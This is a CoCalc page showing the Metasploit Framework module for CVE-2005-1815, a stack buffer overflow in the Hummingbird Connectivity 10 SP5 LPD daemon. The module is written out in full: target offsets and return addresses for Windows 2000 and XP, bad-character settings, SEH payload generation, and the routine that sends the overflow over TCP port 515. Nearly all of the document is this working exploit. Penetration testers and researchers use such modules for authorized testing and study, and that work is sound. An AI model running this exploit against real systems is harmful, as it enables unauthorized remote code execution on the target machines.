CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/windows/lpd/hummingbird_exceed.rb
Views: 11655
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5
6
class MetasploitModule < Msf::Exploit::Remote
7
Rank = AverageRanking
8
9
include Msf::Exploit::Remote::Tcp
10
include Msf::Exploit::Remote::Seh
11
12
def initialize(info = {})
13
super(update_info(info,
14
'Name' => 'Hummingbird Connectivity 10 SP5 LPD Buffer Overflow',
15
'Description' => %q{
16
This module exploits a stack buffer overflow in Hummingbird Connectivity
17
10 LPD Daemon. This module has only been tested against Hummingbird
18
Exceed v10 with SP5.
19
},
20
'Author' => [ 'MC' ],
21
'License' => MSF_LICENSE,
22
'References' =>
23
[
24
['CVE', '2005-1815'],
25
['OSVDB', '16957'],
26
['BID', '13788'],
27
],
28
'Privileged' => true,
29
30
'DefaultOptions' =>
31
{
32
'EXITFUNC' => 'thread',
33
},
34
'Payload' =>
35
{
36
'Space' => 500,
37
'BadChars' => "\x00\x0a",
38
'StackAdjustment' => -3500,
39
},
40
'Platform' => 'win',
41
'Targets' =>
42
[
43
['Windows 2000 English SP0-SP4', { 'Offset' => 1620, 'Ret' => 0x75022ac4 }],
44
['Windows XP English SP0/SP1', { 'Offset' => 1596, 'Ret' => 0x71aa2461 }],
45
],
46
47
'DisclosureDate' => '2005-05-27'))
48
49
register_options( [ Opt::RPORT(515) ])
50
end
51
52
def exploit
53
connect
54
55
filler = rand_text_english(target['Offset'], payload_badchars)
56
seh = generate_seh_payload(target.ret)
57
sploit = filler + seh
58
59
print_status("Trying target #{target.name}...")
60
sock.put(sploit)
61
62
handler
63
disconnect
64
end
65
end
66
67